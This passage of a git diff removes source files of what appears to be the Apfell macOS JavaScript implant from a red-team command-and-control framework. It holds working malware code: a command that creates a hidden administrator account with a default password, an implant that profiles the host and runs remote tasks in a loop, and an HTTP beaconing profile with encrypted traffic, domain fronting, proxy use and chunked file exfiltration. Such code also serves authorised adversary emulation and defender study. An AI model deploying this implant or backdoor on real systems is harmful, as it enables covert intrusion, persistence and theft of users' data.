JSON.parse(params); - let admin = true; - let hidden = true; - let username = ".jamf_support"; - let password = "P@55w0rd_Here"; - let realname = "Jamf Support User"; - let homedir = "/Users/"; - let uniqueid = 403; - let primarygroupid = 80; //this is the admin group - let usershell = "/bin/bash"; - let createprofile = false; - let user = ""; //username of the user with sudo capability to do these commands - let passwd = ""; //password of the user with sudo capability to do these commands - if(config.hasOwnProperty("admin") && typeof config['admin'] == 'boolean'){ admin = config['admin']; } - if(config.hasOwnProperty("hidden") && typeof config['hidden'] == 'boolean'){ hidden = config['hidden']; } - if(config.hasOwnProperty("username") && config['username'] != ''){ username = config['username']; } - if(config.hasOwnProperty("password") && config['password'] != ''){ password = config['password']; } - if(config.hasOwnProperty("realname") && config['realname'] != ''){ realname = config['realname']; } - if(config.hasOwnProperty("uniqueid") && config['uniqueid'] != -1){ uniqueid = config['uniqueid']; } - else if(config.hasOwnProperty('uniqueid') && typeof config['uniqueid'] == 'string' && config['uniqueid'] != ''){ uniqueid = parseInt(config['uniqueid']); } - if(config.hasOwnProperty("primarygroupid") && config['primarygroupid'] != -1){ primarygroupid = config['primarygroupid']; } - else if(config.hasOwnProperty('primarygroupid') && typeof config['primarygroupid'] == 'string' && config['primarygroupid'] != ''){ primarygroupid = parseInt(config['primarygroupid']); } - if(config.hasOwnProperty("usershell") && config['usershell'] != ''){ usershell = config['usershell']; } - if(config.hasOwnProperty("createprofile") && typeof config['createprofile'] == "boolean"){ createprofile = config['createprofile']; } - if(config.hasOwnProperty("homedir") && config['homedir'] != ''){ homedir = config['homedir']; } - else{ homedir += username; } - if(config.hasOwnProperty("user") && config['user'] != ''){ user = config['user']; } - else{ return "User's name is required to do sudo commands"; } - if(config.hasOwnProperty("passwd") && config['passwd'] != ''){ passwd = config['passwd']; } - else{ return "User's password is required to do sudo commands"; } - // now do our series of dscl commands to set up the account - try{ - let cmd = "dscl . create /Users/" + username; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - if(hidden){ - cmd = "dscl . create /Users/" + username + " IsHidden 1"; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - } - cmd = "dscl . create /Users/" + username + " UniqueID " + uniqueid; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "dscl . create /Users/" + username + " PrimaryGroupID " + primarygroupid; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "dscl . create /Users/" + username + " NFSHomeDirectory \"" + homedir + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "dscl . create /Users/" + username + " RealName \"" + realname + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "dscl . create /Users/" + username + " UserShell " + usershell; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - if(admin){ - cmd = "dseditgroup -o edit -a " + username + " -t user admin"; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - } - cmd = "dscl . passwd /Users/" + username + " \"" + password + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - if(createprofile){ - cmd = "mkdir \"" + homedir + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "cp -R \"/System/Library/User Template/English.lproj/\" \"" + homedir + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "chown -R " + username + ":staff \"" + homedir + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - } - return {"user_output": "Successfully ran the commands to create the user", "completed": true}; - }catch(error){ - return{"user_output": error.toString(), "status": "error", "completed": true}; - } - }catch(error){ - return {"user_output": error.toString(), "status": "error", "completed": true}; - } - -}; diff --git a/Payload_Types/apfell/agent_code/base/apfell-jxa.js b/Payload_Types/apfell/agent_code/base/apfell-jxa.js deleted file mode 100755 index 6fa9f98c6..000000000 --- a/Payload_Types/apfell/agent_code/base/apfell-jxa.js +++ /dev/null @@ -1,194 +0,0 @@ -// Created by Cody Thomas - @its_a_feature_ -ObjC.import('Cocoa'); -ObjC.import('Foundation'); //there by default I think, but safe to include anyway -ObjC.import('stdlib'); -ObjC.bindFunction('CFMakeCollectable', ['id', ['void *'] ]); -var currentApp = Application.currentApplication(); -currentApp.includeStandardAdditions = true; -//--------------IMPLANT INFORMATION----------------------------------- -class agent{ - constructor(){ - this.procInfo = $.NSProcessInfo.processInfo; - this.hostInfo = $.NSHost.currentHost; - this.id = ""; - this.user = ObjC.deepUnwrap(this.procInfo.userName); - this.fullName = ObjC.deepUnwrap(this.procInfo.fullUserName); - //every element in the array needs to be unwrapped - this.ip = ObjC.deepUnwrap(this.hostInfo.addresses); //probably just need [0] - this.pid = this.procInfo.processIdentifier; - //every element in the array needs to be unwrapped - this.host = ObjC.deepUnwrap(this.hostInfo.names); //probably just need [0] - //this is a dictionary, but every 'value' needs to be unwrapped - this.environment = ObjC.deepUnwrap(this.procInfo.environment); - this.uptime = this.procInfo.systemUptime; - //every element in the array needs to be unwrapped - this.args = ObjC.deepUnwrap(this.procInfo.arguments); - this.osVersion = this.procInfo.operatingSystemVersionString.js; - this.uuid = "UUID_HERE"; - } -} -var apfell = new agent(); -//--------------Base C2 INFORMATION---------------------------------------- -class baseC2{ - //To create your own C2, extend this class and implement the required functions - //The main code depends on the mechanism being C2 with these functions. - // the implementation of the functions doesn't matter though - // You're welcome to add additional functions as well, but this is the minimum - constructor(interval, baseurl){ - this.interval = interval; //seconds between callbacks - this.baseurl = baseurl; //where to reach out to - this.commands = []; - } - checkin(){ - //check in with c2 server - } - getTasking(){ - //reach out to wherever to get tasking - } - getConfig(){ - //gets the current configuration for tasking - } - postResponse(task, output){ - //output a response to a task - } - setConfig(params){ - //updates the current configuration for how to get tasking - } - download(task, params){ - //gets a file from the apfell server in some way - } - upload(task, params){ - //uploads a file in some way to the teamserver - } -} -C2PROFILE_HERE -//-------------SHARED COMMAND CODE ------------------------ -does_file_exist = function(strPath){ - var error = $(); - return $.NSFileManager.defaultManager.attributesOfItemAtPathError($(strPath).stringByStandardizingPath, error), error.code === undefined; -}; -convert_to_nsdata = function(strData){ - // helper function to convert UTF8 strings to NSData objects - var tmpString = $.NSString.alloc.initWithCStringEncoding(strData, $.NSData.NSUnicodeStringEncoding); - return tmpString.dataUsingEncoding($.NSData.NSUTF16StringEncoding); -}; -write_data_to_file = function(data, file_path){ - try{ - //var open_file = currentApp.openForAccess(Path(file_path), {writePermission: true}); - //currentApp.setEof(open_file, { to: 0 }); //clear the current file - //currentApp.write(data, { to: open_file, startingAt: currentApp.getEof(open_file) }); - //currentApp.closeAccess(open_file); - if(typeof data == "string"){ - data = convert_to_nsdata(data); - } - if (data.writeToFileAtomically($(file_path), true)){ - return "file written"; - } - else{ - return "failed to write file"; - } - } - catch(error){ - return "failed to write to file: " + error.toString(); - } -}; -default_load = function(contents){ - var module = {exports: {}}; - var exports = module.exports; - if(typeof contents == "string"){ - eval(contents); - } - else{ - eval(contents.js); - } - return module.exports; -}; -base64_decode = function(data){ - if(typeof data == "string"){ - var ns_data = $.NSData.alloc.initWithBase64Encoding($(data)); - } - else{ - var ns_data = data; - } - var decoded_data = $.NSString.alloc.initWithDataEncoding(ns_data, $.NSUTF8StringEncoding).js; - return decoded_data; -}; -base64_encode = function(data){ - if(typeof data == "string"){ - var ns_data = convert_to_nsdata(data); - } - else{ - var ns_data = data; - } - var encoded = ns_data.base64EncodedStringWithOptions(0).js; - return encoded; -}; -var exports = {}; // get stuff ready for initial command listing -COMMANDS_HERE -//console.log("about to load commands"); -var commands_dict = exports; -var jsimports = ""; - -//-------------GET IP AND CHECKIN ---------------------------------- -if( $.NSDate.date.compare(C2.kill_date) === $.NSOrderedDescending ){ - $.NSApplication.sharedApplication.terminate(this); -} -let ip_found = false; -C2.commands = Object.keys(commands_dict); -let domain = ""; -if(does_file_exist("/etc/krb5.conf")){ - let contents = $.NSString.stringWithContentsOfFileEncodingError("/etc/krb5.conf", $.NSUTF8StringEncoding, $.nil).js; - contents = contents.split("\n"); - for(let j = 0; j < contents.length; j++){ - if(contents[j].includes("default_realm")){ - domain = contents[j].split("=")[1].trim(); - } - } -} -for(let i=0; i < apfell.ip.length; i++){ - let ip = apfell.ip[i]; - if (ip.includes(".") && ip !== "127.0.0.1"){ // the includes(".") is to make sure we're looking at IPv4 - C2.checkin(ip,apfell.pid,apfell.user,ObjC.unwrap(apfell.procInfo.hostName),apfell.osVersion, "x64", domain); - ip_found = true; - break; - } -} -if(!ip_found){ - C2.checkin("127.0.0.1",apfell.pid,apfell.user,ObjC.unwrap(apfell.procInfo.hostName),apfell.osVersion, "x64", domain); -} -//---------------------------MAIN LOOP ---------------------------------------- -function sleepWakeUp(){ - while(true){ - $.NSThread.sleepForTimeInterval(C2.gen_sleep_time()); - let output = ""; - let task = C2.getTasking(); - //console.log(JSON.stringify(task)); - let command = ""; - try{ - //console.log(JSON.stringify(task)); - if(task.length === 0){ - continue; - } - task = task[0]; - //console.log(JSON.stringify(task)); - command = task["command"]; - try{ - output = commands_dict[command](task, command, task['parameters']); - } - catch(error){ - if(error.toString().includes("commands_dict[command] is not a function")){ - output ={"user_output": "Unknown command: " + command, "status": "error", "completed": true}; - } - else{ - output = {"user_output": error.toString(), "status": "error", "completed": true}; - } - } - C2.postResponse(task, output); - } - catch(error){ - C2.postResponse(task, {"user_output": error.toString(), "status": "error", "completed": true}); - } - //task["command"] = "none"; //reset just in case something goes weird - } -} -sleepWakeUp(); diff --git a/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js b/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js deleted file mode 100644 index 77456745c..000000000 --- a/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js +++ /dev/null @@ -1,494 +0,0 @@ -//-------------RESTFUL C2 mechanisms --------------------------------- -class customC2 extends baseC2{ - constructor(interval, cback_host, cback_port){ - if(cback_port === "443" && cback_host.includes("https://")){ - super(interval, cback_host); - }else if(cback_port === "80" && cback_host.includes("http://")){ - super(interval, cback_host); - }else{ - let last_slash = cback_host.indexOf("/", 8); - if(last_slash === -1){ - //there is no 3rd slash - super(interval, cback_host + ":" + cback_port); - }else{ - //there is a 3rd slash, so we need to splice in the port - super(interval,cback_host.substring(0, last_slash) + ":" + cback_port + "/" + cback_host.substring(last_slash)) - } - } - this.commands = []; - this.url = this.baseurl; - this.getURI = "get_uri"; - this.postURI = "post_uri"; - this.queryPathName = "query_path_name"; - this.proxyURL = "proxy_host"; - this.proxyPort = "proxy_port"; - this.proxyUser = "proxy_user"; - this.proxyPassword = "proxy_pass"; - this.proxy_dict = {}; - if(this.proxyURL !== ""){ - if(this.proxyURL.includes("https")) { - this.proxy_dict["HTTPSEnable"] = 1; - this.proxy_dict["HTTPSProxy"] = this.proxyURL; - this.proxy_dict["HTTPSPort"] = parseInt(this.proxyPort); - }else{ - this.proxy_dict["HTTPEnable"] = 1; - this.proxy_dict["HTTPProxy"] = this.proxyURL; - this.proxy_dict["HTTPPort"] = parseInt(this.proxyPort); - } - } - if(this.proxyUser !== ""){ - this.proxy_dict["kCFProxyUsernameKey"] = this.proxyUser; - } - if(this.proxyPassword !== ""){ - this.proxy_dict["kCFProxyPasswordKey"] = this.proxyPassword; - } - this.jitter = callback_jitter; - this.host_header = "domain_front"; - this.user_agent = "USER_AGENT"; - this.aes_psk = "AESPSK"; // base64 encoded key - if(this.aes_psk !== ""){ - this.parameters = $.CFDictionaryCreateMutable($.kCFAllocatorDefault, 0, $.kCFTypeDictionaryKeyCallBacks, $.kCFTypeDictionaryValueCallBacks); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeyType, $.kSecAttrKeyTypeAES); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeySizeInBits, $.kSecAES256); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeyClass, $.kSecAttrKeyClassSymmetric); - $.CFDictionarySetValue(this.parameters, $.kSecClass, $.kSecClassKey); - this.raw_key = $.NSData.alloc.initWithBase64Encoding(this.aes_psk); - let err = Ref(); - this.cryptokey = $.SecKeyCreateFromData(this.parameters, this.raw_key, err); - } - this.using_key_exchange = "encrypted_exchange_check" === "T"; - this.exchanging_keys = this.using_key_exchange; - if("killdate" !== "yyyy-mm-dd" && "killdate" !== ""){ - this.dateFormatter = $.NSDateFormatter.alloc.init; - this.dateFormatter.setDateFormat("yyyy-MM-dd"); - this.kill_date = this.dateFormatter.dateFromString('killdate'); - }else{ - this.kill_date = $.NSDate.distantFuture; - } - } - get_random_int(max) { - return Math.floor(Math.random() * Math.floor(max + 1)); - } - gen_sleep_time(){ - //generate a time that's this.interval += (this.interval * 1/this.jitter) - if(this.jitter < 1){return this.interval;} - let plus_min = this.get_random_int(1); - if(plus_min === 1){ - return this.interval + (this.interval * (this.get_random_int(this.jitter)/100)); - }else{ - return this.interval - (this.interval * (this.get_random_int(this.jitter)/100)); - } - } - encrypt_message(uid, data){ - // takes in the string we're about to send, encrypts it, and returns a new string - let err = Ref(); - let encrypt = $.SecEncryptTransformCreate(this.cryptokey,err); - let b = $.SecTransformSetAttribute(encrypt, $("SecPaddingKey"), $("SecPaddingPKCS7Key"), err); - b= $.SecTransformSetAttribute(encrypt, $("SecEncryptionMode"), $("SecModeCBCKey"), err); - - //generate a random IV to use - let IV = $.NSMutableData.dataWithLength(16); - $.SecRandomCopyBytes($.kSecRandomDefault, 16, IV.bytes); - b = $.SecTransformSetAttribute(encrypt, $("SecIVKey"), IV, err); - // set our data to be encrypted - let nsdata = $(data).dataUsingEncoding($.NSUTF8StringEncoding); - b=$.SecTransformSetAttribute(encrypt, $.kSecTransformInputAttributeName, nsdata, err); - //$.CFShow(err[0]); - let encryptedData = $.SecTransformExecute(encrypt, err); - // now we need to prepend the IV to the encrypted data before we base64 encode and return it - //generate the hmac - let hmac_transform = $.SecDigestTransformCreate($("HMAC-SHA2 Digest Family"), 256, err); - let hmac_input = $.NSMutableData.dataWithLength(0); - hmac_input.appendData(IV); - hmac_input.appendData(encryptedData); - b=$.SecTransformSetAttribute(hmac_transform, $.kSecTransformInputAttributeName, hmac_input, err); - b=$.SecTransformSetAttribute(hmac_transform, $.kSecDigestHMACKeyAttribute, $.NSData.alloc.initWithBase64Encoding(this.aes_psk), err); - let hmac_data = $.SecTransformExecute(hmac_transform, err); - - let final_message = $.NSMutableData.dataWithLength(0); - final_message.appendData( $(uid).dataUsingEncoding($.NSUTF8StringEncoding) ); - final_message.appendData(IV); - final_message.appendData(encryptedData); - final_message.appendData(hmac_data); - return final_message.base64EncodedStringWithOptions(0); - } - decrypt_message(nsdata){ - //takes in a base64 encoded string to be decrypted and returned - //console.log("called decrypt"); - let err = Ref(); - let decrypt = $.SecDecryptTransformCreate(this.cryptokey, err); - $.SecTransformSetAttribute(decrypt, $("SecPaddingKey"), $("SecPaddingPKCS7Key"), err); - $.SecTransformSetAttribute(decrypt, $("SecEncryptionMode"), $("SecModeCBCKey"), err); - //console.log("making ranges"); - //need to extract out the first 16 bytes as the IV and the rest is the message to decrypt - let iv_range = $.NSMakeRange(0, 16); - let message_range = $.NSMakeRange(16, nsdata.length - 48); // 16 for IV 32 for hmac - let hmac_range = $.NSMakeRange(nsdata.length - 32, 32); - let hmac_data_range = $.NSMakeRange(0, nsdata.length - 32); // hmac includes IV + ciphertext - //console.log("carving out iv"); - let iv = nsdata.subdataWithRange(iv_range); - $.SecTransformSetAttribute(decrypt, $("SecIVKey"), iv, err); - let message = nsdata.subdataWithRange(message_range); - $.SecTransformSetAttribute(decrypt, $("INPUT"), message, err); - // create an hmac and verify it matches - let message_hmac = nsdata.subdataWithRange(hmac_range); - let hmac_transform = $.SecDigestTransformCreate($("HMAC-SHA2 Digest Family"), 256, err); - $.SecTransformSetAttribute(hmac_transform, $.kSecTransformInputAttributeName, nsdata.subdataWithRange(hmac_data_range), err); - $.SecTransformSetAttribute(hmac_transform, $.kSecDigestHMACKeyAttribute, $.NSData.alloc.initWithBase64Encoding(this.aes_psk), err); - let hmac_data = $.SecTransformExecute(hmac_transform, err); - if(hmac_data.isEqualToData(message_hmac)){ - let decryptedData = $.SecTransformExecute(decrypt, Ref()); - //console.log("making a string from the message"); - let decrypted_message = $.NSString.alloc.initWithDataEncoding(decryptedData, $.NSUTF8StringEncoding); - //console.log(decrypted_message.js); - return decrypted_message; - } - else{ - return undefined; - } - } - negotiate_key(){ - // Generate a public/private key pair - let parameters = $({"type": $("42"), "bsiz": 4096, "perm": false}); - let err = Ref(); - let privatekey = $.SecKeyCreateRandomKey(parameters, err); - //console.log("generated new key"); - let publickey = $.SecKeyCopyPublicKey(privatekey); - let exported_public = $.SecKeyCopyExternalRepresentation(publickey, err); - //$.CFShow($.CFMakeCollectable(err[0])); - try{ - //this is the catalina case - let b64_exported_public = $.CFMakeCollectable(exported_public); - b64_exported_public = b64_exported_public.base64EncodedStringWithOptions(0).js; // get a base64 encoded string version - exported_public = b64_exported_public; - }catch(error){ - //this is the mojave and high sierra case - exported_public = exported_public.base64EncodedStringWithOptions(0).js; - } - let s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; - let session_key = Array(20).join().split(',').map(function() { return s.charAt(Math.floor(Math.random() * s.length)); }).join(''); - let initial_message = {"session_id": session_key, "pub_key": exported_public, "action": "staging_rsa"}; - // Encrypt our initial message with sessionID and Public key with the initial AES key - while(true){ - try{ - let stage1 = this.htmlPostData(initial_message, apfell.uuid); - let enc_key = $.NSData.alloc.initWithBase64Encoding(stage1['session_key']); - let dec_key = $.SecKeyCreateDecryptedData(privatekey, $.kSecKeyAlgorithmRSAEncryptionOAEPSHA1, enc_key, err); - // Adjust our global key information with the newly adjusted session key - try{ - this.aes_psk = dec_key.base64EncodedStringWithOptions(0).js; // base64 encoded key - }catch(error){ - let dec_key_collectable = $.CFMakeCollectable(dec_key); - dec_key_collectable = dec_key_collectable.base64EncodedStringWithOptions(0).js; - this.aes_psk = dec_key_collectable; - } - //console.log(JSON.stringify(json_response)); - this.parameters = $({"type": $.kSecAttrKeyTypeAES}); - this.raw_key = $.NSData.alloc.initWithBase64Encoding(this.aes_psk); - this.cryptokey = $.SecKeyCreateFromData(this.parameters, this.raw_key, Ref()); - this.exchanging_keys = false; - return stage1['uuid']; - }catch(error){ - console.log(error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - getConfig(){ - //A RESTful base config consists of the following: - // BaseURL (includes Port), CallbackInterval, KillDate (not implemented yet) - let config = { - "C2": { - "baseurl": this.baseurl, - "interval": this.interval, - "jitter": this.jitter, - "commands": this.commands.join(", "), - "api_version": this.api_version, - "host_header": this.host_header, - "aes_psk": this.aes_psk - }, - "Host": { - "user": apfell.user, - "fullName": apfell.fullName, - "ips": apfell.ip, - "hosts": apfell.host, - "environment": apfell.environment, - "uptime": apfell.uptime, - "args": apfell.args, - "pid": apfell.pid, - "apfell_id": apfell.id, - "payload_id": apfell.uuid - }}; - return JSON.stringify(config, null, 2); - } - checkin(ip, pid, user, host, os, arch, domain){ - //get info about system to check in initially - //needs IP, PID, user, host, payload_type - let info = {'ip':ip,'pid':pid,'user':user,'host':host,'uuid':apfell.uuid, "os":os, "architecture": arch, "domain": domain, "action": "checkin"}; - if(user === "root"){ - info['integrity_level'] = 3; - } - //calls htmlPostData(url,data) to actually checkin - //Encrypt our data - //gets back a unique ID - if(this.using_key_exchange){ - let sessionID = this.negotiate_key(); - //console.log("got session ID: " + sessionID); - var jsondata = this.htmlPostData(info, sessionID); - }else{ - var jsondata = this.htmlPostData(info, apfell.uuid); - } - apfell.id = jsondata.id; - // if we fail to get a new ID number, then exit the application - if(apfell.id === undefined){ $.NSApplication.sharedApplication.terminate(this); } - //console.log(apfell.id); - return jsondata; - } - getTasking(){ - while(true){ - try{ - //let data = {"tasking_size":1, "action": "get_tasking"}; - //let task = this.htmlPostData(this.url, data, apfell.id); - let task = this.htmlGetData(); - //console.log("tasking got back: " + JSON.stringify(task)); - return task['tasks']; - } - catch(error){ - //console.log(error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - postResponse(task, output){ - // this will get the task object and the response output - return this.postRESTResponse(output, task.id); - } - postRESTResponse(data, tid){ - //depending on the amount of data we're sending, we might need to chunk it - data["task_id"] = tid; - let postData = {"action": "post_response", "responses": [data]}; - return this.htmlPostData(postData, apfell.id); - } - htmlPostData(sendData, uid, json=true){ - let url = this.baseurl; - if(this.postURI !== ""){ url += "/" + this.postURI;} - //console.log(url); - //encrypt our information before sending it - let data; - if(this.aes_psk !== ""){ - data = this.encrypt_message(uid, JSON.stringify(sendData)); - }else if(typeof(sendData) === "string"){ - data = $(uid + sendData).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0); - }else{ - data = $(uid + JSON.stringify(sendData)).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0); - } - while(true){ - try{ //for some reason it sometimes randomly fails to send the data, throwing a JSON error. loop to fix for now - //console.log("posting: " + sendData + " to " + urlEnding); - if( $.NSDate.date.compare(this.kill_date) === $.NSOrderedDescending ){ - $.NSApplication.sharedApplication.terminate(this); - } - if( (apfell.id === undefined || apfell.id === "") && (uid === undefined || uid === "")){ $.NSApplication.sharedApplication.terminate(this);} - let req = $.NSMutableURLRequest.alloc.initWithURL($.NSURL.URLWithString(url)); - req.setHTTPMethod($.NSString.alloc.initWithUTF8String("POST")); - let postData = data.dataUsingEncodingAllowLossyConversion($.NSString.NSASCIIStringEncoding, true); - let postLength = $.NSString.stringWithFormat("%d", postData.length); - req.addValueForHTTPHeaderField(postLength, $.NSString.alloc.initWithUTF8String('Content-Length')); - if( this.host_header.length > 0){ - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(this.host_header), $.NSString.alloc.initWithUTF8String("Host")); - } - if (this.user_agent.length > 0){ - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(this.user_agent), $.NSString.alloc.initWithUTF8String("User-Agent")); - } - req.setHTTPBody(postData); - let response = Ref(); - let error = Ref(); - let session_config = $.NSURLSessionConfiguration.ephemeralSessionConfiguration; - session_config.connectionProxyDictionary = $(this.proxy_dict); - let session = $.NSURLSession.sessionWithConfiguration(session_config); - let finished = false; - let responseData; - session.dataTaskWithRequestCompletionHandler(req, (data, resp) => { - finished = true; - responseData = data; - }).resume; - while(!finished){ - delay(0.1); - } - //responseData is base64(UUID + data) - if( responseData.length < 36){ - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - continue; - } - let resp = $.NSData.alloc.initWithBase64Encoding(responseData); - //let uuid_range = $.NSMakeRange(0, 36); - let message_range = $.NSMakeRange(36, resp.length - 36); - //let uuid = $.NSString.alloc.initWithDataEncoding(resp.subdataWithRange(uuid_range), $.NSUTF8StringEncoding).js; - resp = resp.subdataWithRange(message_range); //could either be plaintext json or encrypted bytes - //we're not doing the initial key exchange - if(this.aes_psk !== ""){ - //if we do need to decrypt the response though, do that - if(json){ - resp = ObjC.unwrap(this.decrypt_message(resp)); - return JSON.parse(resp); - }else{ - return this.decrypt_message(resp); - } - }else{ - //we don't need to decrypt it, so we can just parse and return it - if(json){ - return JSON.parse(ObjC.deepUnwrap($.NSString.alloc.initWithDataEncoding(resp, $.NSUTF8StringEncoding))); - }else{ - return $.NSString.alloc.initWithDataEncoding(resp, $.NSUTF8StringEncoding).js; - } - } - } - catch(error){ - //console.log(error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - htmlGetData(){ - let data = {"tasking_size":1, "action": "get_tasking"}; - if(this.aes_psk !== ""){ - data = this.encrypt_message(apfell.id, JSON.stringify(data)).js; - }else{ - data = $(apfell.id + JSON.stringify(data)).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0).js; - } - let NSCharacterSet = $.NSCharacterSet.characterSetWithCharactersInString("/+=\n").invertedSet; - data = $(data).stringByAddingPercentEncodingWithAllowedCharacters(NSCharacterSet).js; - let url = this.baseurl; - if(this.getURI !== ""){ url += "/" + this.getURI; } - url += "?" + this.queryPathName + "=" + data; - while(true){ - try{ - if( $.NSDate.date.compare(this.kill_date) === $.NSOrderedDescending ){ - $.NSApplication.sharedApplication.terminate(this); - } - if(apfell.id === undefined || apfell.id === ""){ $.NSApplication.sharedApplication.terminate(this);} - let req = $.NSMutableURLRequest.alloc.initWithURL($.NSURL.URLWithString(url)); - req.setHTTPMethod($.NSString.alloc.initWithUTF8String("GET")); - if( this.host_header.length > 0){ - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(this.host_header), $.NSString.alloc.initWithUTF8String("Host")); - } - if (this.user_agent.length > 0){ - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(this.user_agent), $.NSString.alloc.initWithUTF8String("User-Agent")); - } - let response = Ref(); - let error = Ref(); - let session_config = $.NSURLSessionConfiguration.ephemeralSessionConfiguration; - session_config.connectionProxyDictionary = $(this.proxy_dict); - let session = $.NSURLSession.sessionWithConfiguration(session_config); - let finished = false; - let responseData; - session.dataTaskWithRequestCompletionHandler(req, (data, resp) => { - finished = true; - responseData = data; - }).resume; - while(!finished){ - delay(0.1); - } - if(responseData.length < 36){ - //this means we likely got back some form of error or redirect message, not our actual data - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - continue; - } - let resp = $.NSData.alloc.initWithBase64Encoding(responseData); - //let uuid_range = $.NSMakeRange(0, 36); - let message_range = $.NSMakeRange(36, resp.length - 36); - //let uuid = $.NSString.alloc.initWithDataEncoding(resp.subdataWithRange(uuid_range), $.NSUTF8StringEncoding).js; - resp = resp.subdataWithRange(message_range); //could either be plaintext json or encrypted bytes - //we're not doing the initial key exchange - if(this.aes_psk !== ""){ - //if we do need to decrypt the response though, do that - resp = ObjC.unwrap(this.decrypt_message(resp)); - return JSON.parse(resp); - }else{ - //we don't need to decrypt it, so we can just parse and return it - return JSON.parse(ObjC.deepUnwrap($.NSString.alloc.initWithDataEncoding(resp, $.NSUTF8StringEncoding))); - } - } - catch(error){ - //console.log("error in htmlGetData: " + error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); //wait timeout seconds and try again - } - } - } - download(task, params){ - // download just has one parameter of the path of the file to download - let output = ""; - if( does_file_exist(params) ){ - let offset = 0; - let chunkSize = 512000; //3500; - // get the full real path to the file - let full_path = params; - try{ - let fm = $.NSFileManager.defaultManager; - let pieces = ObjC.deepUnwrap(fm.componentsToDisplayForPath(params)); - full_path = "/" + pieces.slice(1).join("/"); - var handle = $.NSFileHandle.fileHandleForReadingAtPath(full_path); - // Get the file size by seeking; - var fileSize = handle.seekToEndOfFile; - }catch(error){ - return {'status': 'error', 'user_output': error.toString(), 'completed': true}; - } - // always round up to account for chunks that are < chunksize; - let numOfChunks = Math.ceil(fileSize / chunkSize); - let registerData = {'total_chunks': numOfChunks, 'full_path': full_path}; - let registerFile = this.postResponse(task, registerData); - registerFile = registerFile['responses'][0]; - if (registerFile['status'] === "success"){ - handle.seekToFileOffset(0); - let currentChunk = 1; - let data = handle.readDataOfLength(chunkSize); - while(parseInt(data.length) > 0 && offset < fileSize){ - // send a chunk - let fileData = {'chunk_num': currentChunk, 'chunk_data': data.base64EncodedStringWithOptions(0).js,'file_id': registerFile['file_id']}; - this.postResponse(task, fileData); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - // increment the offset and seek to the amount of data read from the file - offset += parseInt(data.length); - handle.seekToFileOffset(offset); - currentChunk += 1; - data = handle.readDataOfLength(chunkSize); - } - output = {"completed":true, "file_id": registerFile['file_id']}; - } - else{ - output = {'status': 'error', 'user_output': "Failed to register file to download", 'completed': true}; - } - } - else{ - output = {'status': 'error', 'user_output': "file does not exist", 'completed': true}; - } - return output; - } - upload(task, file_id, full_path){ - try{ - let data = {"action": "upload", "file_id": file_id, "chunk_size": 512000, "chunk_num": 1, "full_path": full_path, "task_id": task.id}; - let chunk_num = 1; - let total_chunks = 1; - let total_data = $.NSMutableData.dataWithLength(0); - do{ - let file_data = this.htmlPostData(data, apfell.id); - if(file_data['chunk_num'] === 0){ - return "error from server"; - } - chunk_num = file_data['chunk_num']; - total_chunks = file_data['total_chunks']; - total_data.appendData($.NSData.alloc.initWithBase64Encoding($(file_data['chunk_data']))); - data = {"action": "upload", "file_id": file_id, "chunk_size": 512000, "chunk_num": chunk_num + 1, "task_id": task.id}; - }while(chunk_num < total_chunks); - return total_data; - }catch(error){ - return error.toString(); - } - } -} -//------------- INSTANTIATE OUR C2 CLASS BELOW HERE IN MAIN CODE----------------------- -ObjC.import('Security'); -var C2 = new customC2(callback_interval, "callback_host", "callback_port"); \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/c2_profiles/dynamicHTTP.js b/Payload_Types/apfell/agent_code/c2_profiles/dynamicHTTP.js deleted file mode 100644 index 3d71cbee1..000000000 --- a/Payload_Types/apfell/agent_code/c2_profiles/dynamicHTTP.js +++ /dev/null @@ -1,526 +0,0 @@ -//-------------RESTFUL C2 mechanisms --------------------------------- -class customC2 extends baseC2{ - - constructor(interval, baseurl){ - super(interval, baseurl); - this.commands = []; - this.c2_config = raw_c2_config; - this.get_messages = this.c2_config['GET']['AgentMessage']; - this.post_messages = this.c2_config['POST']['AgentMessage']; - this.interval = this.c2_config['interval']; - this.chunk_size = this.c2_config['chunk_size']; - this.jitter = this.c2_config['jitter']; - this.aes_psk = "AESPSK"; // 